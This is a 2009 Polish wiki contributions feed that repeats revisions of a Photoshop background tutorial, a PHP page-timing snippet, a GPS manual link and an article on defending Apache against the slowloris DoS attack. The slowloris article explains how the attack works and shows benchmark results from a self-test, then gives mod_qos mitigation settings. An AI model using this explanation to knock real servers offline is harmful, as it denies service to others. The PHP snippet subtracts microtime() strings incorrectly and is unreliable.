Podręcznik Administratora by OPZ SGU - Wkład użytkownika [pl]

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:30:36Z

Stare:

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.

Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku '''Layers''' klikamy na '''Dupliacate Layer''' (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę.

Teraz warstwę tą zmienimy na odcienie szarości.

W pasku menu programu klikamy na '''Adjustments''', a następnie na '''Black and White'''. Dzięki temu uzyksujemy poniższy efekt:

[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę ('''Eraser''').

Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową.

Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy ('''Zoom''') z okienka Tools.

[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem '''Antialiasing Disabled''' ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne.

Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć.

Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

[[Plik:blastboy_Antialiasing.png‎]]

W miarę ścierania rybki na podglądzie warstw widać, że rybka zmienia kolor na biały, co świadczy właśnie o usuwaniu części obrazka.

[[Plik:blastboy_Szara_biala.png‎]]

Po zakończeniu czynności nasz obrazek powinien wyglądać tak:

[[Plik:Blastboy_Rybka_koniec.png‎]]

Teraz pozostaje nam tylko zapisanie wyniku do pliku JPG, PNG lub innego i na tym zadanie zakończone. Prawda, że proste?

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:29:03Z

Stare:

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:28:52Z

Stare:

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.
Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku '''Layers''' klikamy na '''Dupliacate Layer''' (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę.

Teraz warstwę tą zmienimy na odcienie szarości.

W pasku menu programu klikamy na '''Adjustments''', a następnie na '''Black and White'''. Dzięki temu uzyksujemy poniższy efekt:

[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę ('''Eraser''').

Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową.

Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy ('''Zoom''') z okienka Tools.

[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem '''Antialiasing Disabled''' ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne.

Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć.

Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

[[Plik:blastboy_Antialiasing.png‎]]

W miarę ścierania rybki na podglądzie warstw widać, że rybka zmienia kolor na biały, co świadczy właśnie o usuwaniu części obrazka.

[[Plik:blastboy_Szara_biala.png‎]]

Po zakończeniu czynności nasz obrazek powinien wyglądać tak:

[[Plik:Blastboy_Rybka_koniec.png‎]]

Teraz pozostaje nam tylko zapisanie wyniku do pliku JPG, PNG lub innego i na tym zadanie zakończone. Prawda, że proste?

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:28:31Z

Stare:

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.
Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku '''Layers''' klikamy na '''Dupliacate Layer''' (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę.
Teraz warstwę tą zmienimy na odcienie szarości.
W pasku menu programu klikamy na '''Adjustments''', a następnie na '''Black and White'''. Dzięki temu uzyksujemy poniższy efekt:

[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę ('''Eraser'''). Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową. Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy ('''Zoom''') z okienka Tools.

[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem '''Antialiasing Disabled''' ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne.
Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć.
Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

[[Plik:blastboy_Antialiasing.png‎]]

W miarę ścierania rybki na podglądzie warstw widać, że rybka zmienia kolor na biały, co świadczy właśnie o usuwaniu części obrazka.

[[Plik:blastboy_Szara_biala.png‎]]

Po zakończeniu czynności nasz obrazek powinien wyglądać tak:

[[Plik:Blastboy_Rybka_koniec.png‎]]

Teraz pozostaje nam tylko zapisanie wyniku do pliku JPG, PNG lub innego i na tym zadanie zakończone. Prawda, że proste?

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:28:10Z

Stare:

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.
Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku '''Layers''' klikamy na '''Dupliacate Layer''' (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę. Teraz warstwę tą zmienimy na odcienie szarości. W pasku menu programu klikamy na '''Adjustments''', a następnie na '''Black and White'''. Dzięki temu uzyksujemy poniższy efekt:

[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę ('''Eraser'''). Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową. Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy ('''Zoom''') z okienka Tools.

[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem '''Antialiasing Disabled''' ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne. Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć. Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

[[Plik:blastboy_Antialiasing.png‎]]

W miarę ścierania rybki na podglądzie warstw widać, że rybka zmienia kolor na biały, co świadczy właśnie o usuwaniu części obrazka.

[[Plik:blastboy_Szara_biala.png‎]]

Po zakończeniu czynności nasz obrazek powinien wyglądać tak:

[[Plik:Blastboy_Rybka_koniec.png‎]]

Teraz pozostaje nam tylko zapisanie wyniku do pliku JPG, PNG lub innego i na tym zadanie zakończone. Prawda, że proste?

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:26:54Z

Stare:

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.
Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku Layers klikamy na Dupliacate Layer (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę. Teraz warstwę tą zmienimy na odcienie szarości. W pasku menu programu klikamy na Adjustments, a następnie na Black and White. Dzięki temu uzyksujemy poniższy efekt:

[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę (Eraser). Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową. Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy (Zoom) z okienka Tools.

[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem Antialiasing Disabled ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne. Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć. Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

[[Plik:blastboy_Antialiasing.png‎]]

W miarę ścierania rybki na podglądzie warstw widać, że rybka zmienia kolor na biały, co świadczy właśnie o usuwaniu części obrazka.

[[Plik:blastboy_Szara_biala.png‎]]

Po zakończeniu czynności nasz obrazek powinien wyglądać tak:

[[Plik:Blastboy_Rybka_koniec.png‎]]

Teraz pozostaje nam tylko zapisanie wyniku do pliku JPG, PNG lub innego i na tym zadanie zakończone. Prawda, że proste?

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:26:39Z

Stare:

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.
Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku Layers klikamy na Dupliacate Layer (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę. Teraz warstwę tą zmienimy na odcienie szarości. W pasku menu programu klikamy na Adjustments, a następnie na Black and White. Dzięki temu uzyksujemy poniższy efekt:
[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę (Eraser). Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową. Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy (Zoom) z okienka Tools.
[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem Antialiasing Disabled ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne. Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć. Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

[[Plik:blastboy_Antialiasing.png‎]]

W miarę ścierania rybki na podglądzie warstw widać, że rybka zmienia kolor na biały, co świadczy właśnie o usuwaniu części obrazka.
[[Plik:blastboy_Szara_biala.png‎]]

Po zakończeniu czynności nasz obrazek powinien wyglądać tak:

[[Plik:Blastboy_Rybka_koniec.png‎]]

Teraz pozostaje nam tylko zapisanie wyniku do pliku JPG, PNG lub innego i na tym zadanie zakończone. Prawda, że proste?

Plik:Blastboy Rybka koniec.png

2009-10-06T15:26:16Z

Stare:

Plik:Blastboy Szara biala.png

2009-10-06T15:25:35Z

Stare:

Plik:Blastboy Antialiasing.png

2009-10-06T15:24:56Z

Stare:

Jak zrobić szare tło wokół kolorowego elementu? (grafika)

2009-10-06T15:24:30Z

Stare: Utworzył nową stronę „Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób. Naszym celem będzie zamienienie niebieskiego tła wokół …”

Sposobów na wykonanie tego zadania jest kilka. Poniżej opisuję pierwszy, z czasem dopiszę drugi sposób.
Naszym celem będzie zamienienie niebieskiego tła wokół złotej rybki na szare.

[[Plik:Blastboy_Rybka_poczatek.png]]

Po załadowaniu zdjęcia do programu, w okienku Layers klikamy na Dupliacate Layer (zaznaczone czerwoną otoczką na obrazku).

[[Plik:Blastboy_Duplicate_layer.png]]

Dzięki temu stworzyliśmy nową warstwę. Teraz warstwę tą zmienimy na odcienie szarości. W pasku menu programu klikamy na Adjustments, a następnie na Black and White. Dzięki temu uzyksujemy poniższy efekt:
[[Plik:Blastboy_Rybka_szara.png‎]]

Następnie z okienka Tools wybieramy gumkę (Eraser). Za jej pomocą wycieramy na szarej warstwie rybkę, dzięki czemu odsłaniamy warstwę, która jest pod nią, czyli warstwę kolorową. Bardzo przydatne przy wycieraniu będzie powiększenie obrazka, za pomocą lupy (Zoom) z okienka Tools.
[[Plik:Blastboy_Rybka_gumka.png‎]]

Z menu narzędzia gumka wybrałem Antialiasing Disabled ponieważ na tym przykładowym obrazku krawędzie rybki są wyraźne. Miękka krawędź gumki jest bardziej przydatna przy wymazywaniu elementów ze zdjęć. Osobiście starałem się nienajeżdżać na krawędzie zewnętrzne rybki, ponieważ niektóre piksele miały niebieski odcień.

Plik:Blastboy Rybka gumka.png

2009-10-06T15:24:09Z

Stare:

Plik:Blastboy Rybka szara.png

2009-10-06T15:23:14Z

Stare:

Plik:Blastboy Duplicate layer.png

2009-10-06T15:22:11Z

Stare:

Plik:Blastboy Rybka poczatek.png

2009-10-06T15:21:29Z

Stare:

Jak wyświetlić czas generowania strony PHP ?

2009-10-05T13:22:39Z

Stare:

Najprostsza metoda to pobranie czasu w którym php rozpoczął generowanie dokumentu oraz zakończył i na podstawie tego obliczyć różnicę.

Na początku badanego skryptu pobieramy czas:

<source lang="php">
<?
$poczatkowy_czas=microtime();
?>
</source>

Następnie na samym dole skryptu PHP pobieramy aktualny czas, odejmujemy początkowy i wyświetlamy różnicę.

<source lang="php">
<?
print("Strona została wygenerowana w ciągu: ");
echo round(microtime()-$poczatkowy_czas, 3);
?>
</source>

Czas zostanie zaokrąglony do wartości 3 miejsc po przecinku.

Przykładowy wynik:
<pre>
Strona została wygenerowana w ciągu: 0.703
</pre>

[[Category:PHP]]

Jak wyświetlić czas generowania strony PHP ?

2009-10-05T13:21:50Z

Stare:

Najprostsza metoda to pobranie czasu w którym php rozpoczął generowanie dokumentu oraz zakończył.

Na początku badanego skryptu pobieramy czas:

<source lang="php">
<?
$poczatkowy_czas=microtime();
?>
</source>

Następnie na samym dole skryptu PHP pobieramy aktualny czas, odejmujemy początkowy i wyświetlamy różnicę.

<source lang="php">
<?
print("Strona została wygenerowana w ciągu: ");
echo round(microtime()-$poczatkowy_czas, 3);
?>
</source>

Czas zostanie zaokrąglony do wartości 3 miejsc po przecinku.

Przykładowy wynik:
<pre>
Strona została wygenerowana w ciągu: 0.703
</pre>

[[Category:PHP]]

Jak wyświetlić czas generowania strony PHP ?

2009-10-05T13:20:26Z

Stare: Utworzył nową stronę „Najprostsza metoda to pobranie czasu w którym php rozpoczął generowanie dokumentu oraz zakończył. Na początku badanego skryptu pobieramy czas: <source lang="p…”

HOLUX M-1200 Bluetooth GPS Receiver (odbiornik GPS bluetooth)

2009-10-05T13:11:59Z

Stare: Utworzył nową stronę „ Pobierz instrukcję --> link=Plik:M-1200-Manual.pdf”

Pobierz instrukcję -->
[[Plik:Pdflogo.jpeg|100px|link=Plik:M-1200-Manual.pdf]]

Plik:M-1200-Manual.pdf

2009-10-05T13:10:42Z

Stare: Instrukcja HOLUX M-1200 Bluetooth GPS Receiver (odbiornik GPS bluetooth)

Instrukcja
HOLUX M-1200 Bluetooth GPS Receiver (odbiornik GPS bluetooth)

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-10-01T16:59:50Z

Stare:

[[Plik:800px-Slow Loris Female.jpg|200px|thumb|right| Slow Loris]]

Atak pieszczotliwie nazywany slowloris należy do typów z grupy DoS.

Jego kluczowym celem jest zmuszenie serwera www do otwarcia jak największej liczby jednoczesnych połączeń z fikcyjnymi klientami które są generowane poprzez skrypt. Serwer otwiera gniazdo nasłuchujące ale nie otrzymuje od klienta pełnego zapytania, przez co połączenie nie może być zrealizowane. Serwer zakłada automatycznie że w najbliższym czasie klient dostarczy brakujące części więc gniazdo jest cały czas otwarte i zabiera zasoby serwera.

Całkowita blokada serwera następuje w momencie wykorzystania ustalonego odgórnie przez administratora limitu jednoczesnych połączeń.

Skrypt co chwilę prosi o kolejną porcję informacji, co powoduje ponowne otwarcie gniazd usuniętych jako nieużywane z powodu przekroczenia limitu czasu.

Atak ten pozwala na stosunkowo szybkie zablokowanie nawet bardzo potężnego serwera przy wykorzystaniu łącza o bardzo małej przepustowości.

Następującym skryptem wykonamy atak na swój serwer, oraz sprawdzimy skuteczność mechanizmów obronnych.
[[Slowloris.pl_(Skrypt)| Źródło skryptu oraz przykład użycia]]

Ochrona przed atakiem tego typu jest prawie niemożliwa przy zastosowaniu domyślnych funkcji wbudowanych w Apache.

Naszą linię obrony można rozgraniczyć na trzy grupy.

*1) Drastyczne zwiększenie liczby otwartych połączeń
*2) Twarde ograniczenie liczby jednoczesnych połączeń z jednego adresu IP.
*3) Zmniejszenie czasu żywotności otwartego połączenia

Co niosą za sobą powyższe metody?.
*1) Nic nie trwa wiecznie, ta metoda spowoduje tylko oddalenie punktu przepełnienia.
*2) Uderzy w rozległe sieci korporacyjne korzystające z technologii NAT (ucierpieć mogą niewinne osoby).
*3) Uderzy w osoby dysponujące słabym łączem, lub chwilowo przeciążonymi sieciami.
[[Plik:Server-status(apache).png|200px|thumb|right| Atak slowloris na zabezpieczony serwer]]

Najrozsądniejszym rozwiązaniem jest instalacja modułu mod-qos który pozwala na ścisłe kontrolowanie przepływam zapytań kierowanych na nasz serwer.

Dawniej był on instalowany w celu ograniczenia transferu, dzisiaj zyskał nowe kluczowe znaczenie.

== Test wpływu ataku slowloris na serwer Apache bez zabezpieczeń. ==

Serwer nie podlegający atakowi bez zabezpieczeń 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 5756 hits
Availability: 99.71 %
Elapsed time: 59.69 secs
Data transferred: 45.79 MB
Response time: 1.46 secs
Transaction rate: 96.43 trans/sec
Throughput: 0.77 MB/sec
Concurrency: 141.06
Successful transactions: 5755
Failed transactions: 17
Longest transaction: 29.90
Shortest transaction: 0.00
</pre>

Ten sam serwer, po kilkunastu minutach pracy skryptu slowloris.
<pre>
done.
Transactions: 0 hits
Availability: 0.00 %
Elapsed time: 60.22 secs
Data transferred: 0.00 MB
Response time: 0.00 secs
Transaction rate: 0.00 trans/sec
Throughput: 0.00 MB/sec
Concurrency: 0.00
Successful transactions: 0
Failed transactions: 304
Longest transaction: 0.00
Shortest transaction: 0.00
</pre>

Wniosek: Całkowita odmowa świadczenia usług.

== Instalacja modułu wraz z konfiguracją zaprezentowana na [http://howtoforge.com/how-to-defend-slowloris-ddos-with-mod_qos-apache2-on-debian-lenny howtoforge] (tłumaczenie) ==

Pobranie, oraz wypakowanie

<pre>
cd /tmp/
wget http://sourceforge.net/projects/mod-qos/files/mod-qos/8.18/mod_qos-8.18-src.tar.gz/download
tar xvfz mod_qos-*
</pre>

Instalacja źródeł apache potrzebnych do kompilacji

<pre>
apt-get install apache2-threaded-dev gcc
</pre>

Kompilacja oraz instalacja
<pre>
cd mod_qos-8.13/apache2/
apxs2 -i -c mod_qos.c
</pre>

Konfiguracja
<pre>
cd /etc/apache2/mods-available/
nano qos.load
</pre>

Jako treść
<pre>
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
</pre>

<pre>
nano qos.conf
</pre>

Jako treść
<pre>
## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients 256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose 180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate 150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields 30
# QS_LimitRequestBody 102400
</IfModule>
</pre>

Uruchomienie

<pre>
a2enmod qos
/etc/init.d/apache2 restart
</pre>

Podgląd pracy można obserwować pod adresem
<pre>
http://ip_serwera/server-status
</pre>

== Test wpływu ataku slowloris na serwer Apache z zabezpieczeniami (limity w qos). ==

Serwer podlegający atakowi z zabezpieczeniami 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 9902 hits
Availability: 100.00 %
Elapsed time: 60.11 secs
Data transferred: 47.94 MB
Response time: 0.29 secs
Transaction rate: 164.73 trans/sec
Throughput: 0.80 MB/sec
Concurrency: 47.74
Successful transactions: 5063
Failed transactions: 0
Longest transaction: 12.77
Shortest transaction: 0.00

</pre>

Wniosek: Jeden użytkownik (w powyższej konfiguracji) może za alokować maksymalnie 50 połączeń z jednego adresu IP, lub sieci NAT dysponującej wspólnym IP.

Plik:Server-status(apache).png

2009-10-01T16:55:22Z

Stare: server-status podczas ataku slowloris z zabezpieczeniami.

server-status podczas ataku slowloris z zabezpieczeniami.

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-10-01T16:53:03Z

Stare:

[[Plik:800px-Slow Loris Female.jpg|200px|thumb|right| Slow Loris]]

Atak pieszczotliwie nazywany slowloris należy do typów z grupy DoS.

Jego kluczowym celem jest zmuszenie serwera www do otwarcia jak największej liczby jednoczesnych połączeń z fikcyjnymi klientami które są generowane poprzez skrypt. Serwer otwiera gniazdo nasłuchujące ale nie otrzymuje od klienta pełnego zapytania, przez co połączenie nie może być zrealizowane. Serwer zakłada automatycznie że w najbliższym czasie klient dostarczy brakujące części więc gniazdo jest cały czas otwarte i zabiera zasoby serwera.

Całkowita blokada serwera następuje w momencie wykorzystania ustalonego odgórnie przez administratora limitu jednoczesnych połączeń.

Skrypt co chwilę prosi o kolejną porcję informacji, co powoduje ponowne otwarcie gniazd usuniętych jako nieużywane z powodu przekroczenia limitu czasu.

Atak ten pozwala na stosunkowo szybkie zablokowanie nawet bardzo potężnego serwera przy wykorzystaniu łącza o bardzo małej przepustowości.

Następującym skryptem wykonamy atak na swój serwer, oraz sprawdzimy skuteczność mechanizmów obronnych.
[[Slowloris.pl_(Skrypt)| Źródło skryptu oraz przykład użycia]]

Ochrona przed atakiem tego typu jest prawie niemożliwa przy zastosowaniu domyślnych funkcji wbudowanych w Apache.

Naszą linię obrony można rozgraniczyć na trzy grupy.

*1) Drastyczne zwiększenie liczby otwartych połączeń
*2) Twarde ograniczenie liczby jednoczesnych połączeń z jednego adresu IP.
*3) Zmniejszenie czasu żywotności otwartego połączenia

Co niosą za sobą powyższe metody?.
*1) Nic nie trwa wiecznie, ta metoda spowoduje tylko oddalenie punktu przepełnienia.
*2) Uderzy w rozległe sieci korporacyjne korzystające z technologii NAT (ucierpieć mogą niewinne osoby).
*3) Uderzy w osoby dysponujące słabym łączem, lub chwilowo przeciążonymi sieciami.

Najrozsądniejszym rozwiązaniem jest instalacja modułu mod-qos który pozwala na ścisłe kontrolowanie przepływam zapytań kierowanych na nasz serwer.

Dawniej był on instalowany w celu ograniczenia transferu, dzisiaj zyskał nowe kluczowe znaczenie.

== Test wpływu ataku slowloris na serwer Apache bez zabezpieczeń. ==

Serwer nie podlegający atakowi bez zabezpieczeń 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 5756 hits
Availability: 99.71 %
Elapsed time: 59.69 secs
Data transferred: 45.79 MB
Response time: 1.46 secs
Transaction rate: 96.43 trans/sec
Throughput: 0.77 MB/sec
Concurrency: 141.06
Successful transactions: 5755
Failed transactions: 17
Longest transaction: 29.90
Shortest transaction: 0.00
</pre>

Ten sam serwer, po kilkunastu minutach pracy skryptu slowloris.
<pre>
done.
Transactions: 0 hits
Availability: 0.00 %
Elapsed time: 60.22 secs
Data transferred: 0.00 MB
Response time: 0.00 secs
Transaction rate: 0.00 trans/sec
Throughput: 0.00 MB/sec
Concurrency: 0.00
Successful transactions: 0
Failed transactions: 304
Longest transaction: 0.00
Shortest transaction: 0.00
</pre>

Wniosek: Całkowita odmowa świadczenia usług.

== Instalacja modułu wraz z konfiguracją zaprezentowana na [http://howtoforge.com/how-to-defend-slowloris-ddos-with-mod_qos-apache2-on-debian-lenny howtoforge] (tłumaczenie) ==

Pobranie, oraz wypakowanie

<pre>
cd /tmp/
wget http://sourceforge.net/projects/mod-qos/files/mod-qos/8.18/mod_qos-8.18-src.tar.gz/download
tar xvfz mod_qos-*
</pre>

Instalacja źródeł apache potrzebnych do kompilacji

<pre>
apt-get install apache2-threaded-dev gcc
</pre>

Kompilacja oraz instalacja
<pre>
cd mod_qos-8.13/apache2/
apxs2 -i -c mod_qos.c
</pre>

Konfiguracja
<pre>
cd /etc/apache2/mods-available/
nano qos.load
</pre>

Jako treść
<pre>
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
</pre>

<pre>
nano qos.conf
</pre>

Jako treść
<pre>
## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients 256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose 180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate 150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields 30
# QS_LimitRequestBody 102400
</IfModule>
</pre>

Uruchomienie

<pre>
a2enmod qos
/etc/init.d/apache2 restart
</pre>

Podgląd pracy można obserwować pod adresem
<pre>
http://ip_serwera/server-status
</pre>

== Test wpływu ataku slowloris na serwer Apache z zabezpieczeniami (limity w qos). ==

Serwer podlegający atakowi z zabezpieczeniami 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 9902 hits
Availability: 100.00 %
Elapsed time: 60.11 secs
Data transferred: 47.94 MB
Response time: 0.29 secs
Transaction rate: 164.73 trans/sec
Throughput: 0.80 MB/sec
Concurrency: 47.74
Successful transactions: 5063
Failed transactions: 0
Longest transaction: 12.77
Shortest transaction: 0.00

</pre>

Wniosek: Jeden użytkownik (w powyższej konfiguracji) może za alokować maksymalnie 50 połączeń z jednego adresu IP, lub sieci NAT dysponującej wspólnym IP.

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-10-01T16:32:50Z

Stare:

[[Plik:800px-Slow Loris Female.jpg|200px|thumb|right| Slow Loris]]

Atak pieszczotliwie nazywany slowloris należy do typów z grupy DoS.

Jego kluczowym celem jest zmuszenie serwera www do otwarcia jak największej liczby jednoczesnych połączeń z fikcyjnymi klientami które są generowane poprzez skrypt. Serwer otwiera gniazdo nasłuchujące ale nie otrzymuje od klienta pełnego zapytania, przez co połączenie nie może być zrealizowane. Serwer zakłada automatycznie że w najbliższym czasie klient dostarczy brakujące części więc gniazdo jest cały czas otwarte i zabiera zasoby serwera.

Całkowita blokada serwera następuje w momencie wykorzystania ustalonego odgórnie przez administratora limitu jednoczesnych połączeń.

Skrypt co chwilę prosi o kolejną porcję informacji, co powoduje ponowne otwarcie gniazd usuniętych jako nieużywane z powodu przekroczenia limitu czasu.

Atak ten pozwala na stosunkowo szybkie zablokowanie nawet bardzo potężnego serwera przy wykorzystaniu łącza o bardzo małej przepustowości.

Następującym skryptem wykonamy atak na swój serwer, oraz sprawdzimy skuteczność mechanizmów obronnych.
[[Slowloris.pl_(Skrypt)| Źródło skryptu oraz przykład użycia]]

Ochrona przed atakiem tego typu jest prawie niemożliwa przy zastosowaniu domyślnych funkcji wbudowanych w Apache.

Naszą linię obrony można rozgraniczyć na trzy grupy.

*1) Drastyczne zwiększenie liczby otwartych połączeń
*2) Twarde ograniczenie liczby jednoczesnych połączeń z jednego adresu IP.
*3) Zmniejszenie czasu żywotności otwartego połączenia

Co niosą za sobą powyższe metody?.
*1) Nic nie trwa wiecznie, ta metoda spowoduje tylko oddalenie punktu przepełnienia.
*2) Uderzy w rozległe sieci korporacyjne korzystające z technologii NAT (ucierpieć mogą niewinne osoby).
*3) Uderzy w osoby dysponujące słabym łączem, lub chwilowo przeciążonymi sieciami.

Najrozsądniejszym rozwiązaniem jest instalacja modułu mod-qos który pozwala na ścisłe kontrolowanie przepływam zapytań kierowanych na nasz serwer.

Dawniej był on instalowany w celu ograniczenia transferu, dzisiaj zyskał nowe kluczowe znaczenie.

== Test wpływu ataku slowloris na serwer Apache bez zabezpieczeń. ==

Serwer nie podlegający atakowi bez zabezpieczeń 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 5756 hits
Availability: 99.71 %
Elapsed time: 59.69 secs
Data transferred: 45.79 MB
Response time: 1.46 secs
Transaction rate: 96.43 trans/sec
Throughput: 0.77 MB/sec
Concurrency: 141.06
Successful transactions: 5755
Failed transactions: 17
Longest transaction: 29.90
Shortest transaction: 0.00
</pre>

Ten sam serwer, po kilkunastu minutach pracy skryptu slowloris.
<pre>
done.
Transactions: 0 hits
Availability: 0.00 %
Elapsed time: 60.22 secs
Data transferred: 0.00 MB
Response time: 0.00 secs
Transaction rate: 0.00 trans/sec
Throughput: 0.00 MB/sec
Concurrency: 0.00
Successful transactions: 0
Failed transactions: 304
Longest transaction: 0.00
Shortest transaction: 0.00
</pre>

Wniosek: Całkowita odmowa świadczenia usług.

